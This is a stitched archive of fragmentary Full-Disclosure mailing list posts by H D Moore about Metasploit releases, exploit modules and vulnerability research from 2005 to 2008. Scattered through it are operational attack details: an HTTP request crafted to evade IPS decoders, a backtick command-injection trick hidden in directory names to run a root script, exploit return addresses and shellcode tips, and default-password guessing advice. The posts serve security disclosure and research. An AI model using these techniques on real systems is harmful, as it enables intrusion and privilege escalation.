8"Y88 8P'8P" 888 "Y88P" 888 "Y888
888
888
888
Contact: H D Moore FOR IMMEDIATE RELEASE
Email: hdm[at]metasploit.com
Austin, Te
You can find our SecTOR presentation online at:
http://metasploit.com/research/conferences/
Grab an early of 3.2 (testing) from SVN:
$ svn co http://metasploit.com/svn/framework3/trunk/ msf32/
A little bit about the new licensing (much more to follow):
http://www.darkreading.com/document.as
On Friday 25 July 2008, tixxDZ wrote:
> I do not want to offend anyone (Metasploit people), this is a simple
> joke: can you share with us all the logs of the vulnerable servers ?
> ;) , the exploit will use the Metasploit service to verify
> exploitability. ex checking my Opendns:
The exploit nee
Problem solved. Someone is ARP poisoning the IP address of the router on which
the www.metasploit.com server resides.
I hardcoded an ARP entry for the real router and that seems to solve the MITM
issue. It doesn't help the other 250 servers
on that network, but thats an issue for the ISP to res
Looks like someone is doing ARP poisoning at the ISP level. The actual
metasploit.com server(s) are untouched, but someone is still managing to
MITM a large portion of the incoming traffic. To make things even more
fun, its cooinciding with a DoS attack (syn floods) on most of the open
services
http://metasploit.com/users/hdm/tools/debian-openssl/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
The WebKit folks just added client-side SQL database support:
http://webkit.org/blog/126/webkit-does-html5-client-side-database-storage/
http://glazkov.com/blog/html5-gears-wrapper/
In addition to all of the existing attacks through a web browser, we can
now take into account SQLite vulnerabili
Available online at:
https://strikecenter.bpointsys.com/
-HD
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
ative
folks in the security research community" said H D Moore, project
manager. Moore is referring the numerous research projects that have
lent code to the framework.
These projects include the METASM pure-ruby assembler developed by
Yoann Guillot and Julien Tinnes, the "Hacking the
Use 0x71aa15cf for pop/pop/ret on WinXP SP2/SP3 English
Download the mini-database here:
http://metasploit.com/users/hdm/tools/opcodes_xp_sp2_sp3.tar.gz
>From the README:
This package contains a text listing of addresses which can be useful for
exploitation. Each subdirectory represents a type
Changes between DCERPC services on XP SP2 and XP SP3 (release candidate)
This is from a quick and dirty unmidl.py + diff(3) session[1]
Results do not include new services bundled with SP3.
Results are likely incomplete.
Verify this with mIDA.
Happy holidays.
Thanks Dave
For UNMIDL
Cheers,
-HD
--
The last part of my iPhone-related blog entries was posted last night. The
first article discusses the architecture and provides some useful
shellcode for already-modified phones.
http://blog.metasploit.com/2007/09/root-shell-in-my-pocket-and-maybe-yours.html
The second article discusses the
Good point! I didn't like the intro that much, it will be revisted in the
next revision :-) Thanks for the feedback!
-HD
On Thursday 09 August 2007 19:24, Hernan Ochoa wrote:
> The only thing I would argue is the concept that your paper is actually
> 'INTRODUCING a tactical approach to penetrati
At Black Hat 2007 and Defcon 15, Valsmith and I gave a talk
entitled "Tactical Exploitation". This talk introduced a tactical
approach to penetration testing that does not rely on exploiting known
vulnerabilities. During the talk, we used a combination of new tools and
lesser-known techniques t
Apparently I can't read before 10:00am :) 3APA3A corrected me, the RFC
states that there can actually be multiple CRLF before the start of the
request. Time to find some coffee...
Thanks for the feedback!
-HD
On Wednesday 20 June 2007 09:19, H D Moore wrote:
> The note in RFC 2616,
Agreed. The point was that IPS vendors have put a large amount of effort
into normalizing IIS-specific encodings, but fail to handle
Apache-specific quirks.
The note in RFC 2616, Section 4.1, refers to a single CRLF before the
Request-Line. Prepending multiple CRLFs or non-printable character
Summarized from https://strikecenter.bpointsys.com/
Many commercial IPS products fail to decode HTTP requests which use 0x0c,
0x0b, and 0x0d instead of the normal 0x20/0x09 separators. A request in
the following format will evade most IPS protocol decoders:
$ echo -ne "GET\x0c/cgi-bin/phf\x0cHT
this someone was (confirmed) not
David. SecureWorks is based in Atlanta. All times are CDT.
I sent the following message last night at 7:02pm.
---
From: H D Moore
To: David Maynor
Subject: Zero-day I promised
Date: Tue, 5 Jun 2007 19:02:11 -0500
User-Agent: KMail/1.9.3
MIME-Version: 1.0
Co
Metasploit 2 only runs modules written in the Metasploit 2 Perl format.
Metasploit 3 only runs modules written in the Metasploit 3 Ruby format.
Keep in mind that many exploits also depend on a specific version or
update of the Metasploit Framework. If the exploit is for Metasploit 3
and uses th
Two new exploit modules are available for version 3.0 of the Metasploit
Framework. These modules can be obtained by using the 'Online Update'
feature in Windows and the 'svn update' command on Unix-like systems.
Matt Miller posted to the Metasploit Blog about our ANI efforts:
http://blog.metaspl
March 27th, 2007 -- Metasploit is pleased to announce the immediate,
free availability of the Metasploit Framework version 3.0 from
http://framework.metasploit.com/.
The Metasploit Framework ("Metasploit") is a development platform for
creating security tools and exploits. Version 3.0 contains 17
It might be more effective to contribute to the Wireshark Wiki:
- http://wiki.wireshark.org/SampleCaptures
-HD
On Wednesday 14 February 2007 11:17, crazy frog crazy frog wrote:
> As it is not possible for everyone to setup different networks
> quickly,I am thinking to start a wiki which will con
Try using root:root, root:admin, admin:admin, and radmin:radmin via telnet
and ssh for these systems:
http://www.linuxforums.org/forum/other-distributions/63848-help-linux-version.html
-HD
On Friday 09 February 2007 05:22, Mark Sec wrote:
> any1 have experience over these "boxes"?, we have man
Shiny new (remote) kernel-mode exploits for Metasploit 3:
http://kernelfun.blogspot.com/2006/11/mokb-13-11-2006-d-link-dwl-g132.html
http://kernelfun.blogspot.com/2006/11/mokb-11-11-2006-broadcom-wireless.html
-HD
___
Full-Disclosure - We believe in it
Doh. I read too quickly. Ryan Naraine pointed out that there is no patch,
the advisory just confirms that people are exploiting it.
-HD
On Wednesday 01 November 2006 13:21, H D Moore wrote:
> http://www.microsoft.com/technet/security/advisory/927709.m
http://www.microsoft.com/technet/security/advisory/927709.mspx
The Metasploit 2 module (ie_createobject)[1] has been exploiting this bug
since it was released in August. Glad to see they finally noticed.
Thanks to Aviv for noticing / sending me the link.
-HD
1. http://metasploit.com/projects/F
Lorenzo's Kernel Fun project:
http://kernelfun.blogspot.com/
The Metasploit 3 exploit module:
http://metasploit.com/svn/framework3/trunk/modules/auxiliary/dos/wireless/daringphucball.rb
Media coverage so far:
http://www.securityfocus.com/brief/344
http://www.darkreading.com/document.asp?doc_id=10
The Metasploit Framework is an advanced open-source exploit development
platform. The 3.0 tree represents a complete rewrite of the 2.0 codebase
and provides a scalable and extensible framework for security tool
development. The 3.0 Beta 3 release includes support for exploit
automation[1], 802
The Metasploit Framework is an advanced open-source exploit development
platform. The 2.7 release includes three user interfaces, 157 exploits
and 76 payloads.The Framework will run on any modern operating system
that has a working Perl interpreter. The Windows installer includes a
slimmed-down
Nice work Aviv! All of these methods, along with a few extras, are
implemented in the Metasploit 2.6 version of this module. Last I checked,
not a single AV or IPS could pick it up. This module should work on every
version and service pack of Windows.
http://metasploit.com/projects/Framework/ex
The exploit for NT 4.0 is *exactly* the same packet as the one you would
also use on Windows 2000. I am suprised that this is considered a "NT 4"
worm and not a "Windows 2000 (+NT 4.0)" worm. Is something specific about
the exploit they use that prevents it from working on Windows 2000?
-HD
On
On Saturday 12 August 2006 12:16, Thierry Zoller wrote:
> OHoh, when can we expect a DNS tunnel, tunneling a shell through your
> DNS requests and DNS answers ? :) A nice remote shell thorugh dns
> tunnel over XSS. LOL :)
Heh. I actually have a plan for doing that :-)
1) Create a metasploit paylo
Hello,
I worked on something similar, it uses Java in the same way, but also uses
a custom DNS server to obtain even more information:
Demo:
http://metasploit.com/research/misc/decloak/
Code:
http://metasploit.com/research/misc/decloak/HelloWorld.java
-HD
On Saturday 12 August 2006 03:55, pdp
The DLLs for XP SP2 and 2003 SP1 were compiled with Visual Studio's stack
protection flag (/GS). This prevents a standard return address overwrite
from working. The wcscpy() method everyone is using in their exploits is
also blocked by another change in how the compiler orders and passes
argume
At some point, depending on time. Feel free to add one :-)
-HD
On Thursday 10 August 2006 06:03, David Taylor wrote:
> Hi HD,
>
> Do you plan on building a 'check' feature into this in the future? I
> find those to be very handy in scripting checks on our systems.
__
:
http://metasploit.com/projects/Framework/modules/exploits/netapi_ms06_040.pm
-- Forwarded Message --
Subject: [framework] Metasploit Framework Updates
Date: Thursday 10 August 2006 02:52
From: H D Moore <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Hello everyone,
I just pushed out a
Core Impact and Canvas both have exploits out. Metasploit technically has
one, but it hasn't been completed/released yet.
-HD
On Wednesday 09 August 2006 13:10, Matt Davis wrote:
> Did I completely miss exploit code being released in the wild for that
> vulnerability?
__
AxMan is now public:
- http://metasploit.com/users/hdm/tools/axman/
-HD
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
for all the feedback!
-HD
On Friday 28 July 2006 13:47, H D Moore wrote:
> The demonstration exploit now works on Windows, Linux, and both
> architectures of Mac OS X. A friend of mine reported that is also works
> on the Camino browser:
>
> http://browserfun.blogspot.com/2006/07/
The demonstration exploit now works on Windows, Linux, and both
architectures of Mac OS X. A friend of mine reported that is also works
on the Camino browser:
http://browserfun.blogspot.com/2006/07/mobb-28-mozilla-navigator-object.html
Enjoy,
-HD
__
http://metasploit.com/research/misc/mwsearch/?q=bagle
Enjoy,
-HD
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Yet another SMB memory leak. There are tons of these in SRVSVC. The key to
finding them is to force large padding values (ie. holes between
DataOffset/ParameterOffset and end of packet). A quick hack is to use the
SMB ECHO command with a non-aligned byte size. I have yet to see anything
actuall
I have been receiving spam to unique addresses provided to H&R Block for
over a year now. If this is the same company you used, you aren't the
only one. Using an email address with the original company name clearly
embedded within it makes tracking down this kind of abuse easier. It has
a side
t;bad" traffic that happens to exit through your node (attempted server
exploitation, pornography not involving adults, etc). My current
implementation uses an embedded ruby intepreter and a set of ruby modules
to perform the protocol detection and filtering.
Thanks for testing!
-HD
On Mo
A fun browser toy that depends on Java for complete results:
- http://metasploit.com/research/misc/decloak/
-HD
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http
Install the Metasploit Framework (v2.5), then use msfpescan:
$ msfpescan -f something.dll -D | grep IAT
-HD
On Monday 22 May 2006 10:43, Andres Molinetti wrote:
> I want to find if a specific function is defined in a given set of
> dlls' IAT (Import Address Table).
> Does anyone know a tool
No need to patch the client at all. The Metasploit Framework module
proxies the connection and lets you exploit the flaw with any standard
client. If you have vncviewer in your path (or are running the Windows
version of the Framework), it also auto-connects :-)
-HD
http://metasploit.com/proje
I dont believe you understand - the exploit details were available to
anyone who could access Metalink. Alexander did not disclose these flaws,
the Oracle user who posted the bug report did. The only reason Oracle
takes security seriously is because folks like Mr. Kornbrust and Mr.
Litchfield a
On Thursday 23 March 2006 13:44, Georgi Guninski wrote:
> a triple more reasons to send all of your 0days to m$:
Can always count on you Georgi :-)
> 1. only you can save mankind
> (they still need you, so it is not clear if several years old
> tru$tworthy computing can save mankind)
You are
How bugs can you find in your browser? The recent IE issues only scratched
the service of the DHTML/behavior bugs. The HTML/JS page below can be
used to find all sorts of bugs in different browsers. I stopped caring
about these after the first three invalid derefences.
http://metasploit.com/use
These work great:
http://www.udrw.com/
-HD
On Tuesday 21 March 2006 11:24, Pego, Victor wrote:
> Hi,
>
> I need to figure out how to autorun a file on a USB flash pen drive.
> Just like you can do with a CD - put it in and it starts running the
> program - I want to do with the pen drive. I've re
Works well against Firefox 1.5.0.1 on the following systems:
- Windows XP SP2
- Windows 2003 SP0
- Windows 2000 SP4
However, it does not work with Opera 8.5 on any platform. Should just be a
matter of changing return addresses based on the user-agent though...
-HD
On Friday 17 February 2006 02:
On Friday 17 February 2006 02:05, Matthew Murphy wrote:
> Interesting issue with regards to the module-list pointers.
[ snip ]
> The heap spray technique works very effectively -- you end up with a
> *sizable* pad in the 0x04a0 region which you can use as a direct
> jump point for the paylo
uot;;
On Thursday 16 February 2006 19:15, c0ntex wrote:
> On 16/02/06, H D Moore <[EMAIL PROTECTED]> wrote:
> > Still getting some annoying crashes (SEH trick in alphanum code is
> > annoying when you are trying to debug something...), but the basic
> > solution is:
>
&
Still getting some annoying crashes (SEH trick in alphanum code is
annoying when you are trying to debug something...), but the basic
solution is:
1) Use alphanumeric shellcode
2) Use a return address that does not have bytes over 0x7F
3) Use a pop/pop/ret and hop over return w/o restricted byte
day 23 January 2006 08:40, H D Moore wrote:
> Nice DoS bug, next time try emailing us first :-)
>
> -HD
>
> On Monday 23 January 2006 04:23, cranium pain wrote:
> > WMF Exploit vulnerable?
> >
> > [*] Starting Reverse Handler.
> > [*] Waiting for connectio
Nice DoS bug, next time try emailing us first :-)
-HD
On Monday 23 January 2006 04:23, cranium pain wrote:
> WMF Exploit vulnerable?
>
> [*] Starting Reverse Handler.
> [*] Waiting for connections to http://0.0.0.0:80/
> [*] Got connection from 0.0.0.0:443 <-> 1.1.1.1:42121
> [*] Sending Stage (2
://www.sensepost.com/research/bidiblah/
The next version of the Metasploit Framework (v3) has support for 'recon'
modules that technically you could use to automate this, but it will take
some time before this is usable.
-HD
On Tuesday 17 January 2006 18:04, H D Moore wrote:
> You should
You should check out the Metasploit Framework:
- http://metasploit.com/projects/Framework/
When I viewed the online demo of SAINT Exploit in December of 2005, nearly
all of their exploit modules had names very similar to the ones found in
version 2.5 of the Metasploit Framework. The demo has b
Any chance you contacted Wehnus about it? The "hot fix" is just to open
regedit, browse to this key, and place the command line quotes. Minor
problem, but I am sure Matt would have appreciated an email first.
-HD
On Monday 16 January 2006 14:47, Thierry Zoller wrote:
> Dear List,
>
> Small blu
---
wine-20050930/dlls/gdi/driver.c
---
/**
Escape [EMAIL PROTECTED]
*/
INT WINAPI Escape( HDC hdc, INT escape, INT in_count, LPCSTR in_data,
LPVOID out_data )
{
INT ret;
POINT *pt;
switch (escape)
{
ca
Q) Why did you release an IDS and AV evading exploit module so soon after
the vulnerability was discovered?
A) The vulnerability was being exploited, in the wild, for at least two
weeks (based on email reports) prior to the original BT post. The WMF
structure is widely documented. The AV vendor
From my experience on XP/2003, IE will only render WMF files as images if
the "placeable" header has been added before the WMF header. The addition
of the "placeable" header prevents the SetAbortProc from being reached in
the Escape() function, due to a check on the device context (credits to
m
We just released a new version of the Metasploit Framework exploit module
for the Escape/SetAbortFunc code execution flaw. This module now pads the
Escape() call with random WMF records. You may want to double check your
IDS signatures -- most of the ones I saw today could be easily bypassed
or
On Wednesday 28 December 2005 19:16, Nick FitzGerald wrote:
> The fact it was used for installing spyware (and may have been so for
> near on two weeks now) simply shows you where the money is these days.
Its a sad state of affairs when $19.95 crapware scams make more money than
cleaning out a fe
In reference to:
http://www.securityfocus.com/archive/1/420288/30/0/threaded
I ported the exploit to the Metasploit Framework in case anyone wants to
test it without installing a thousand spyware apps...
Available from 'msfupdate' for MSF users, or in the 2.5 snapshot:
--http://metasploit.com/p
This may not be a limitation if you can use the argument-skipping syntax
in msvcrt (ie. %4000$x).
-HD
On Friday 16 December 2005 08:32, FistFucker wrote:
>I don't think it's > exploitable because the user controlled string is
>many thousand bytes away from the stack pointer and you can only send
The Metasploit staff is proud to present the first alpha release of the
3.0 branch of the Metasploit Framework. This release marks a major
milestone in the evolution of the Metasploit Framework and is based on a
complete rewrite of the 2.x series.
The 3.0 branch is designed to provide automatio
Assuming that the find command will report a directory or file that you
control,
you can use the symlink to overwrite a shell script, and then place shell
commands
into your file name:
$ mkdir \`cd\..\;cd\ ..\;cd\ ..\;cd\ ..\;cd\ ..\;cd\ ..\;cd\ tmp\;sh\ root.sh\`
$ echo id > /tmp/root.sh
$ chm
Hi everyone,
Looks like some overzealous idiot at McAfee added "Trojan" signatures for
202 files in the latest version of the Metasploit Framework. If you use
the Framework for your job and have a McAfee support contract, *please*
call them and let them know that their product is incorrectly ta
The Metasploit Project has released three new vulnerability sets and a
password dumping extension to the Meterpreter payload. Enjoy!
-HD
[ PGP Desktop Wipe Free Space Flaw ]
PGP Desktop includes a Wipe Free Space utility that claims to eliminate
data in all the free space on your hard drive in
I found an old document and some crappy perl code on my system, figured
someone might find it interesting:
"Unauthorized network links are one of the biggest problems facing large
enterprise networks. Users intent on bypassing corporate proxies will
often use cable modems, wireless networks, or
905856\$vs")'
-HD
On Tuesday 29 November 2005 11:15, H D Moore wrote:
> On Tuesday 29 November 2005 04:07, [EMAIL PROTECTED] wrote:
> > [snip ] so so if remote code execution is successful, it would
> > lead to a full remote root com
On Tuesday 29 November 2005 04:07, [EMAIL PROTECTED] wrote:
> [snip ] so so if remote code execution is successful, it would
> lead to a full remote root compromise in a standard configuration.
> DESCRIPTION. The username parameter of the login form is logged via
> the perl `syslog' facility in
Execution flaw: google_proxystylesheet_exec.
No code is required to exploit the other flaws.
Researcher(s):
H D Moore (hdm[at]metasploit.com)
Vulnerability Details:
The Google Search Appliance search interface uses the 'proxystylesheet'
form variable to determine what style sheet t
I believe 5.2 and 5.3 are vulnerable as well, there are other fun bugs
hiding in there too :) Filemon rocks.
-HD
On Tuesday 25 October 2005 15:26, Bernhard Mueller wrote:
> This flaw was discovered in version 5.1 of RSA Agent for Web. No other
> versions were available for testing. Web Agents >5
Attached some in-progress code for the snort bug, getting through the
while() loop that modifies both 'i' and 'len' is annoying. Any ideas on
making this more reliable? It works great on my -ggdb version , but runs
off a page during a memcmp() on my normal binary.
-HD
snort_bo_ping.pm
Descrip
The Metasploit Framework is an advanced open-source exploit
development platform. The 2.5 release includes three user interfaces,
105 exploits and 75 payloads.
The Framework will run on any modern operating system that has a working
Perl interpreter. The Windows installer includes a slimmed-down v
It doesn't work that way ;-) You either get to abuse the bug or tell the
them about it; trying to do both is what gets people put into jail. In
your communication with the company, you could always ask for a discount
on your service or some other perk (in a polite and non-demanding way),
but IM
Does anyone have an idea on how to trigger this? Debian and SuSE say this
is a denial of service. Gentoo says "code execution", but they are the
ones who found the bug. Most zlib bugs can be exploited prior to
authentication in OpenSSH. The patch being is being distributed by the
vendors and is
The Metasploit Framework is an advanced open-source exploit
development platform. The 2.4 release includes three user interfaces,
72 exploits and 75 payloads.
The Framework will run on any modern operating system that has a working
Perl interpreter. The Windows installer includes a slimmed-down ve
Marc,
I will buy you *two* Xbox's for a nice IIS 6.0 remote :-)
Seriously, the "market value" of a remote exploit for IIS 6.0 is
somewhere between two and twenty thousand dollars, depending on how
shady you want to get. These "find some 0day and give it to us"
challenges are a waste of a time
If you care at all about security, run, don't walk, away from this
software. Another simple overflow via the "LOGIN" IMAP command:
A001 LOGIN (>1024 bytes)\r\n
-HD
On Tuesday 05 April 2005 12:31, expanders wrote:
> -=[+] Application:Mail Enable Imapd ( MEIMAP.exe )
_
83 matches
Mail list logo
